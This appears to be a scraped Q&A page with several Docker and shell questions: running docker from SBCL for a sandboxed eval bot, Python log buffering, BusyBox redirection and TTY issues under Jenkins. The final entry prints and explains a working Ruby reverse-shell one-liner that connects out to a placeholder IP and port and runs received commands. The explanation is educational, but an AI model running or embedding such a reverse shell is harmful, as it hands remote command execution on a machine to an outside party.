Execute 'docker run' from within SBCL Common Lisp - docker

I'm trying to run a function in my lisp program. It is a bot that is connected to an IRC channel and with a special command you can query the bot to evaluate a simple lisp command. Because it is extremely dangerous to execute arbitrary code from people on the internet I want the actual evaluation to happen in a VM that is running a docker for every evaluation query the bot gets.
My function looks like this:
(defun run-command (cmd)
(uiop:run-program (list "docker" "run" "--rm" "-it" "my/docker" "sbcl" "--noinform" "--no-sysinit" "--no-userinit" "--noprint" "--disable-debugger" "--eval" (string-trim '(#\^M) (format nil "~A" cmd))) "--eval" "'(quit)'") :output '(:string :stripped t))
The idea behind this function is to start a docker that contains SBCL, runs the command via SBCL --eval and prints it to the docker std-out. And this printed string should be the result of run-command.
If I call
docker run --rm -it my/docker sbcl --noinform --no-sysinit --no-userinit --noprint --disable-debugger --eval "(print (+ 2 3))" --eval "(quit)"
on my command line I just get 5 as an result, what is exactly what I want.
But if I run the same command within lisp, with the uiop:run-program function I get
Subprocess #<UIOP/LAUNCH-PROGRAM::PROCESS-INFO {1004FC3923}>
with command ("docker" "run" "--rm" "-it"
"my/docker" "sbcl" "--noinform"
"--no-sysinit" "--no-userinit" "--noprint"
"--disable-debugger" "--eval" "(+ 2 3)")
as an error message, which means the process failed somehow. But I don't know what exactly could be wrong here. If I just execute for example "ls" I get the output, so the function seems to work properly.
Is there some special knowledge I need about uiop:run-program or am I doing something completely wrong?
Thanks in advance.
Edit: So it turns out that the -it flag caused issues. After removing the flag a new error emerges. Now the bot has not the permissions to execute docker. Is there a way to give it the permissions without granting it sudo rights?

There's, probably, something wrong with the way docker is invoked here (or SBCL). To get the error message, invoke uiop:run-program with :error-output :string argument, and then choose the continue restart to, actually, terminate execution and get the error output printed (if you're running from SLIME or some other REPL). If you call this in a non-interactive environment, you can wrap the call in a handler-bind:
(handler-bind ((uiop/run-program:subprocess-error
(lambda (e) (invoke-restart (find-restart 'continue)))))
(run-command ...))

It turned out the -it did cause trouble. After removing it and elevating the correct permissions to the bot everything worked out fine.

Related

My docker container keeps instantly closing when trying to run an image for bigcode-tools

I'm new to Docker, and I'm not sure how to quite deal with this situation.
So I'm trying to run a docker container in order to replicate some results from a research paper, specifically from here: https://github.com/danhper/bigcode-tools/blob/master/doc/tutorial.md
(image link: https://hub.docker.com/r/tuvistavie/bigcode-tools/).
I'm using a windows machine, and every time I try to run the docker image (via: docker run -p 80:80 tuvistavie/bigcode-tools), it instantly closes. I've tried running other images, such as the getting-started, but that image doesn't close instantly.
I've looked at some other potential workarounds, like using -dit, but since the instructions require setting an alias/doskey for a docker run command, using the alias and chaining it with other commands multiple times results in creating a queue for the docker container since the port is tied to the alias.
Like in the instructions from the GitHub link, I'm trying to set an alias/doskey to make api calls to pull data, but I am unable to get any data nor am I getting any errors when performing the calls on the command prompt.
Sorry for the long question, and thank you for your time!
Going in order of the instructions:
0. I can run this, it added the image to my Docker Desktop
1.
Since I'm using a windows machine, I had to use 'set' instead of 'export'
I'm not exactly sure what the $ is meant for in UNIX, and whether or not it has significant meaning, but from my understanding, the whole purpose is to create a directory named 'bigcode-workspace'
Instead of 'alias,' I needed to use doskey.
Since -dit prevented my image from instantly closing, I added that in as well, but I'm not 100% sure what it means. Running docker run (...) resulted in the docker image instantly closing.
When it came to using the doskey alias + another command, I've tried:
(doskey macro) (another command)
(doskey macro) ^& (another command)
(doskey macro) $T (another command)
This also seemed to be using github api call, so I also added a --token=(github_token), but that didn't change anything either
Because the later steps require expected data pulled from here, I am unable to progress any further.
Looks like this image is designed to be used as a command-line utility. So it should not be running continuously, but you run it via alias docker-bigcode for your tasks.
$BIGCODE_WORKSPACE is an environment variable expansion here. So on a Windows machine it's %BIGCODE_WORKSPACE%. You might want to set this variable in Settings->System->About->Advanced System Settings, because variables set with SET command will apply to the current command prompt session only. Or you can specify the path directly, without environment variable.
As for alias then I would just create a batch file with the following content:
docker run -p 6006:6006 -v %BIGCODE_WORKSPACE%:/bigcode-tools/workspace tuvistavie/bigcode-tools %*
This will run the specified command appending the batch file parameters at the end. You might need to add double quotes if BIGCODE_WORKSPACE path contains spaces.

"docker logs" command only shows stderr [duplicate]

When using a print() statement in a Python app running inside a Docker container that's managed by Docker Compose, only sys.stderr output is logged. Vanilla print() statements aren't seen, so this:
print("Hello? Anyone there?")
... never shows up in the regular logs:
(You can see other logs explicitly printed by other libs in my app, but none of my own calls.)
How can I avoid my print() calls being ignored?
By default, Python buffers output to sys.stdout.
There are a few options:
1. Call an explicit flush
Refactor the original print statement to include a flush=True keyword, like:
print("Hello? Anyone there?", flush=True)
Note: This will cause the entire buffer to flush, not just the same print call. So if there are 'bare' print function calls elsewhere (i.e. without flush=True) that weren't explicitly unbuffered, these will always be flushed too.
You could achieve the same thing with:
import sys
sys.stdout.flush()
This option is useful if you want the most control of when the flushing will occur.
2. Unbuffer the entire app via the PYTHONUNBUFFERED env var
Drop the following into the environment section of your docker-compose.yml file:
PYTHONUNBUFFERED: 1
This will cause all output to stdout to be flushed immediately.
3. Run python with -u
Like option #2 above, this will cause Python to run 'unbuffered' across the full execution lifetime of your app. Just run with python -u <entrypoint.py> - no need for the environment variable.
Simple, if you add the option -u in the line of the Dockerfile it will print your logs:
CMD ["python", "-u", "my_python_script.py"]
No need of changing an environment variable or change all the prints statements of your program.
Using pytest, the solution for me was to add the -s option.
For example, in my scenario where I also needed verbose mode on, I had to put pytest -sv.

How does BusyBox evade my redirection of stdout, and can I work around it?

I have a BusyBox based system, and another one with vanilla Ubuntu LTS.
I made a C++ program which takes main()'s argv[1] as a command name, to fork() and execl() that command in the child process. Right before, I did dup2() to redirect the child's standard output, similar to this, so the parent process can read() its output.
Then, the text read from the child is written to the console, with markers, to see that it was the parent who output this.
Now if I run this program with, as its arg, "dd --help", then two different things happen:
on the Ubuntu system, the output clearly comes from the parent process (and only)
on the BusyBox system, the parent process reads back nothing, and the output of dd writes directly to the console, apparently bypassing my (attempt at) redirection.
Since all the little commands on the BusyBox system are symlinks to the one BusyBox executable and I thought there could be a problem, I also tried making a child process out of "busybox dd --help".
That changed nothing, though.
But: if I do "busybox --help", all of the output is caught by the child process and nothing "spilled besides" it. (note I left out the "sub command" dd here, only --help for BusyBox itself)
What's the reason for this happening, and (how) can I get this to work as intended, on the BusyBox system, too?
Busybox is outputting its own output, e.g. when calling it with options like --help, on stdout. But its implemented commands, like "dd", are output on stderr - even if it's not errors, which I found rather unintuitive and hence didn't look down that alley at first.

How to run repo from a script inside a container in a jenkins job

I am unable to run repo non-interactively inside a container as part of a freestyle job.
It prompts for the user-name and email. I got round that by doing a git config --global inside the job.
But then it does the color test, and that hangs indefinitely.
Looking at the source code for repo I see this
if os.isatty(0) and os.isatty(1) and not self.manifest.IsMirror:
if opt.config_name or self._ShouldConfigureUser():
self._ConfigureUser()
self._ConfigureColor()
So, I ran the following inside the container:
python -C "import os; print os.isatty(0), os.isatty(1)"
and, sure enough, it printed out True True
Looking at the Jenkins log, it launches the container with --tty specified, and there seems no way to configure that option.
I can't find a bash option to force a script to be run in a non-interactive shell. If I put the above python line in a file and execute it with almost any combination of commands and options, it still prints out True True
The only way I see something different is if I use I/O redirection
bash <a.sh
which prints out False True - i.e. stdin is not a tty, and
bash <a.sh >a.log
which prints False False.
For a complex script, are there any problems using the bash <script approach?
Does anyone know any jenkins magic to prevent docker being launched using --tty?
I know that the --tty is the culprit. I built the container locally and ran the following
$ docker run repotest python -c "import os;print os.isatty(0), os.isatty(1)"
False False
$ docker run --tty repotest python -c "import os;print os.isatty(0), os.isatty(1)"
True True
Running Versions:
repo: 1.12.37 (per Ubuntu 16.04 apt-get)
Jenkins: 2.149
Cloudbees Docker Plugin: 1.7.3
Container base is ubuntu:xenial
I'm using the "Build inside a docker container" option.
To run bash script repo_script.sh "non-interactively", or more exactly speaking without having terminals associated with standard streams, you could run your script simply as
repo_script.sh < /dev/null 2>&1 | cat
assuming you want to see the output the way you would see it running simply as repo_script.sh. By piping the standard output and error to a different process the file descriptor appears as a pipe and not TTY to repo_script.sh. You could also direct output to a file, or even to /dev/null if you do not care about the output:
log_file=/dev/null
repo_script.sh < /dev/null > "${log_file}" 2>&1
Running the script as
bash < repo_script.sh | cat
might would work too, though it is very unorthodox and to my mind hackish way of running a script just to break the association of TTY to the standard input. From script engine point of view, it is different to read a script program from a file than from standard input (which typically, if it is a terminal, is not seekable), so there might be some subtle differences that could possibly bite you in unexpected ways. This way does not as clearly communicate your intention to the next person that need to understand your code, and may lead to partial hair loss in that person due to extraneous head scratching.
There is no need for any bash options, just using the output directions from within the interpreting shell as above described is an easy-to-comprehend, multi-platform compatible standard convention for changing the standard stream associations.
P.S. I think it should be enough for your repo script to just test if the standard input is a TTY. It looks to me like the author of that script did not think deeply enough there. There is simply no use waiting for input if you do not have terminal device associated with standard input, and you could determine that everything needs to run without user interaction from there or stop with an error if that is not possible.

Ruby one-liner breakdown?

I'm new to Ruby and trying to better understand this reverse shell one-liner designed to connect back to a Netcat listener.
Can someone try breaking the command down and explaining what some of the code actually does? For example, I know "TCPSocket.new" creates the new TCP socket, but what's "cmd=c.gets", "IO.popen", "|io|c.print io.read", etc. And what is the purpose of the while loop?
ruby -rsocket -e "c=TCPSocket.new('<IP Address>','<Port>');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"
OK, let's break this one down.
ruby
runs the ruby interpreter, you likely knew that part
-rsocket
does the equivalent of require "socket" (r for require)
-e "some string"
run some string as a ruby script (e for execute)
while(cmd=c.gets)
is saying "while gets (get string up to and including the next newline) returns something from the connection c, i.e. while there's data coming in, assign it to cmd and..
IO.popen(cmd,'r'){|io|c.print io.read}
.. run cmd as a shell command, read the output, and print it back onto the connection c.
So, effectively, receive a command (like ls . or rm -rf /) over the network, read it in, run it, take the output, and send it back. Keep doing so until the other side stops sending commands.
Because gets will block and wait for the next line to come in, this one-liner will sit there waiting until the connection is closed.
Probably don't want to let other people send commands down that connection, since it'll run whatever they send directly on your computer, though that's presumably what you mean by "reverse shell".

Resources